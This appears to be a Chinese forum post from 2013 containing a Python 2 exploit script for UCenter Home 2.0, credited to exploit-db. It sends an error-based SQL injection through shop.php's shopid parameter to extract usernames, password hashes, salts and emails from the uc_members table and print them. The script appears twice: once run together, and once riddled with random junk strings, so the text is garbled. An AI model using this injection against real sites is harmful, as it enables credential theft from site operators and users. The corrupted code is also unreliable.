#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl5 T0 ?5 M% c' X2 M
# K7 Z# R- T. w! u
: d# X$ n) `$ ~8 y( F
#!/usr/bin/env python % j9 \5 h" b; m+ V. l) h
$ u5 h2 |8 M. r5 {% Iimport sys , ^+ s; ]% T1 x
import urllib2 6 Q& B1 h' o% Y( Y" }
import re ! ~9 |/ f1 a. w5 K
+ o; ~$ P3 X, Vdef info():
5 F$ @8 c4 f* q y" Y' l print 'From:http://www.exploit-db.com/exploits/14997/' & ~$ b" f8 ]$ o4 j, B# F2 ^
print 'http://www.hake.cc/Web_loudong/' 5 l* W. S; G9 ? ?4 X" b% m8 i
print 'changed:qiaoy' _4 e" y% }$ O$ S8 s5 k
print 'exp:'
# n+ h7 ^. ?3 `' Y6 S: S print ' ./UCenter_Home_2.0.py site'
+ Q# q3 f6 {7 U' s0 |
* I( L( F% V( Y7 V) {: Mdef main():
3 u3 h$ q0 ]5 e) Z D1 R: c if len(sys.argv) != 2: ; L0 @, F" L0 n' n5 B
info()
5 z9 v& G/ P' A; x9 w/ m else: ! F+ w+ S+ h) G7 Q1 ]
site = sys.argv[1]
1 B; T$ d; m: s7 f% W U if site[0:7] == 'http://':
, f F: i4 C. `& l) o sitesite =site - c" l# D9 y( D: d
elif site[0:8] == 'https://':
# h& {" _, Q+ u3 h- d y& Q: k sitesite = site + p# W/ \6 f9 @2 q$ X2 r% Y
else:
5 t! [. P5 ]& }! e) X) _0 e site = 'http://'+site ) K2 g! C) Y* u& V9 x
try:
6 S( b" c" H, t; F5 v) K url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1' " D J2 B9 G, c) v3 s# H0 D4 F
Value = urllib2.urlopen(url).read() 2 w, q4 ^4 P' {/ ?/ v, G
Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0] , w4 t; _# d! I
hacked = Msg.split(':')
2 ]8 s3 Y s$ r5 S( f/ O) V1 ] print 'Name: '+hacked[1] # D. {8 x ~! h7 r; p
print 'Passwd: '+hacked[2]
0 g3 @4 n2 D6 |2 l print 'salt: '+hacked[3]
7 z1 a, G# q5 e! V: ~7 C: X print 'email: '+hacked[4] & @: z( E! W( }
except:
( F8 s# t0 v( S. _4 Z- q3 ?# e print 'Sorry,I can\'t work............'
, O7 M* ~3 |3 ?/ P: n1 S
2 E; X6 G5 I& e) g9 Y" }7 D. fif __name__ == '__main__':
8 f! N' \* V2 K \ main() |
发表于 2013-1-23 09:18:17
收藏
支持
反对